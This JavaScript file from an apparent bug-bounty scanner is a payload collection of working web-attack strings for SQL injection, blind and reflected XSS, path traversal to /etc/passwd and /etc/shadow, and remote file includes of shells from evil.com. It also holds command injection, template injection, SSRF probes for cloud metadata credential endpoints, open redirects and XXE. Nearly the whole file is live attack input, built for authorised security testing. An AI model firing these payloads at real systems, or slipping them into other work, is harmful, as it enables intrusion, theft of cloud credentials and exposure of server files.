// BountyScope — payload sets (ported from ReconSpider Pro v10 active scanner).
// Blind XSS payloads carry a CANARY placeholder replaced at scan time from the
// user's collector URL (D14 fix: never fires at a third-party collector by default).
'use strict';

const BS_PAYLOADS = {

  // ── SQLi Error-Based ──────────────────────────────────────────────────────
  SQLi_ERROR: [
    "'",
    '"',
    "''",
    '`',
    "\\",
    "1'",
    '1"',
    "' OR '1'='1",
    "' OR 1=1--",
    "' OR 1=1#",
    "1 AND 1=1",
    "1 AND 1=2",
    "' UNION SELECT NULL--",
    "1' ORDER BY 1--",
    "1' ORDER BY 999--",
    "' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x7e,0x27,version(),0x27,0x7e,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--",
  ],

  // ── SQLi Boolean-Based (pairs: a = true, b = false) ───────────────────────
  SQLi_BOOLEAN: [
    { a: "1 AND 1=1",            b: "1 AND 1=2" },
    { a: "' OR '1'='1'--",       b: "' OR '1'='2'--" },
    { a: "1",                    b: "0" },
    { a: "1 OR 1=1",             b: "1 OR 1=2" },
    { a: "' OR 1=1 LIMIT 1--",   b: "' OR 1=2 LIMIT 1--" },
  ],

  // ── SQLi Time-Based ───────────────────────────────────────────────────────
  SQLi_TIME: [
    "';WAITFOR DELAY '0:0:5'--",
    "'; waitfor delay '0:0:6' --",
    "1 WAITFOR DELAY '0:0:5'--",
    "1 AND 1=1 WAITFOR DELAY '0:0:5'--",
    "0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z",
    "1'XOR(94102*if(now()=sysdate(),sleep(6),0))XOR'Z",
    "\"XOR(if(now()=sysdate(),sleep(5),0))XOR\"",
    "'XOR(if(now()=sysdate(),sleep(10),0))XOR'X",
    "query'XOR(SELECT(0)FROM(SELECT(SLEEP(9)))a)XOR'Z",
    "500' AND (SELECT 9590 FROM (SELECT(SLEEP(8)))XFQD)-- rWRS",
    "'+AND+(SELECT+2016+FROM+(SELECT(SLEEP(15)))SIfv)+AND+'vDZP'='vDZP",
    "1' AND SLEEP(5)--",
    "1' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--",
    "select sleep(10)",
    "1; SELECT pg_sleep(5)--",
    "select pg_sleep(10)",
    "' || (SELECT pg_sleep(10))--",
    "dbms_pipe.receive_message('a',10)",
    "waitfor delay '0:0:10'",
  ],

  // ── Blind XSS (CANARY → user collector URL) ───────────────────────────────
  Blind_XSS: [
    '--></tiTle></stYle></texTarea></scrIpt>"/\'//><scrIpt src="CANARY"></scrIpt>',
    '\';--"></textarea></script><script src="CANARY"></script>',
    '"><img src="x" onerror="eval(atob(this.id))" id="CANARY">',
    '<x/oncut=alert(1)>a',
    '<body/onload=<!-->&amp;#10alert(1)>',
    '<--`<img/src=` onerror=alert(1)> --!>',
    '{{constructor.constructor("fetch(\'CANARY\')")()}}',
  ],

  // ── Reflected XSS ─────────────────────────────────────────────────────────
  XSS: [
    '<script>alert(1)</script>',
    '"><script>alert(1)</script>',
    "'><script>alert(1)</script>",
    '<img src=x onerror=alert(1)>',
    '"><img src=x onerror=alert(1)>',
    '"><img src=x onerror=prompt(1);>',
    'javascript:alert(1)',
    '<svg onload=alert(1)>',
    '<iframe src="javascript:alert(1)">',
    '"><details open ontoggle=alert(1)>',
  ],

  // ── LFI / Path Traversal ──────────────────────────────────────────────────
  LFI: [
    '../../../etc/passwd',
    '../../../../etc/passwd',
    '../../../../../etc/passwd',
    '../../../../../../../../../../etc/passwd',
    '../../../etc/passwd%00',
    '../../../../../../../../../../etc/passwd%00',
    '%252e%252e%252fetc%252fpasswd',
    '%252e%252e%252fetc%252fpasswd%00',
    '%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd',
    '%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00',
    '....//....//etc/passwd',
    '..///////..////..//////etc/passwd',
    '/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd',
    '../windows/win.ini',
    '../../windows/win.ini',
    '../../../windows/win.ini',
    'php://filter/read=convert.base64-encode/resource=index.php',
    'php://filter/convert.base64-encode/resource=../config.php',
    '/proc/self/environ',
    '/proc/self/cmdline',
    '/etc/shadow',
    '/etc/hosts',
    '..%2F..%2Fetc%2Fpasswd',
    '%2e%2e%2f%2e%2e%2fetc%2fpasswd',
    '..%252f..%252fetc%252fpasswd',
  ],

  // ── RFI / SSRF-adjacent includes ──────────────────────────────────────────
  RFI: [
    'http://evil.com/shell.txt',
    'http://evil.com/shell.txt%00',
    'https://evil.com/shell.txt',
    '//evil.com/shell.txt',
    'http:%252f%252fevil.com%252fshell.txt',
    '\\\\10.0.0.1\\share\\shell.php',
    'http://169.254.169.254/latest/meta-data/',
    'http://127.0.0.1/',
    'file:///etc/passwd',
    'dict://127.0.0.1:22/',
    'gopher://127.0.0.1:22/',
  ],

  // ── RCE / OS Command Injection ────────────────────────────────────────────
  OS_CMD: [
    '; id',
    '| id',
    '`id`',
    '$(id)',
    '; cat /etc/passwd',
    '| cat /etc/passwd',
    '`cat /etc/passwd`',
    '; whoami',
    '| whoami',
    '&& id',
    '|| id',
    '\n/bin/id',
    '%0aid',
    '%0a/bin/id',
    '"|id||"',
    '; sleep 5',
    '| sleep 5',
    '`sleep 5`',
    '$(sleep 5)',
    '; ping -c 5 127.0.0.1',
  ],

  // ── SSTI (8*9 → 72: the evaluated result NEVER appears in the payload, so a
  // plain reflection can never false-positive; 7*7 → 49 kept as cross-check) ─
  SSTI: [
    '{{8*9}}',
    '#{8*9}',
    '<%=8*9%>',
    '{8*9}',
    '{{=8*9}}',
    '{=8*9}',
    '@{8*9}',
    '@(8*9)',
    '${8*9}',
    '${{8*9}}',
    '${{<%[%\'"}}%.',
    '{{7*7}}',
    '${7*7}',
    '*{7*7}',
    '{{config}}',
    '{{self}}',
    '{{[].__class__.__base__.__subclasses__()}}',
    '{{request.environ}}',
    '%7B%7B8*9%7D%7D',
  ],

  // ── SSRF ──────────────────────────────────────────────────────────────────
  SSRF: [
    'http://169.254.169.254/latest/meta-data/',
    'http://169.254.169.254/latest/meta-data/iam/security-credentials/',
    'http://169.254.169.254/latest/user-data',
    'http://metadata.google.internal/computeMetadata/v1/',
    'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/',
    'http://[::]:80/',
    'http://[0000::1]:80/',
    'http://[0:0:0:0:0:ffff:127.0.0.1]',
    'http://[::ffff:127.0.0.1]',
    'http://localtest.me',
    'http://127.127.127.127',
    'http://127.0.1.3',
    'http://0/',
    'http://127.1',
    'http://2130706433/',
    'http://0x7f000001',
    'http://127.0.0.1:22/',
    'http://127.0.0.1:3306/',
    'http://127.0.0.1:6379/',
    'http://127.0.0.1:8080/',
    'http://0.0.0.0:80/',
    'http://[::1]/',
    'http://localhost/',
    'file:///etc/passwd',
    'dict://attacker:11111/',
    'sftp://evil.com:11111/',
    'tftp://evil.com:12346/TESTUDPPACKET',
    'ldap://localhost:11211/%0astats%0aquit',
    'gopher://localhost:25/_MAIL%20FROM:<attacker@example.com>%0D%0A',
    'dict://127.0.0.1:6379/info',
    'gopher://127.0.0.1:6379/_INFO%0d%0a',
  ],

  // ── Open Redirect ─────────────────────────────────────────────────────────
  OPEN_REDIRECT: [
    'https://evil.com',
    '//evil.com',
    '/\\evil.com',
    'https://evil.com%2F',
    '/%09/evil.com',
    '/%2F/evil.com',
    '//evil.com/%2F..',
    '///evil.com',
    '/\\/evil.com',
  ],

  // ── XXE ───────────────────────────────────────────────────────────────────
  XXE: [
    '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>',
    '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://169.254.169.254/">]><foo>&xxe;</foo>',
    '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE data [<!ELEMENT data ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]><data>&xxe;</data>',
    '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY % xxe SYSTEM "file:///etc/passwd">%xxe;]><foo/>',
  ],
};
